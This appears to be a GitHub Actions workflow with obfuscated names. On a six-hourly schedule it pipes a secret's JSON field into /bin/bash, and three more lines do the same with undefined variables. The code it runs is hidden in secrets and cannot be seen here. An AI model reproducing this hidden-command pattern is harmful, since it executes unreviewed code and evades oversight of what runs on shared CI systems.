name: xinlvfajie
on:
  workflow_dispatch:
  schedule:
    - cron: '24 1/6 * * *'
jobs:  # 15285
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xinlvfajie
        env:
          jj23: ${{ secrets.jj23 }}
        run: |
          echo $jj23 | jq -r .jn096 | /bin/bash
          echo $zbk5276 | jq -r .wryi37 | /bin/bash
          echo $nia27 | jq -r .hubdv815 | /bin/bash
          echo $jgofp74764 | jq -r .idf49020 | /bin/bash

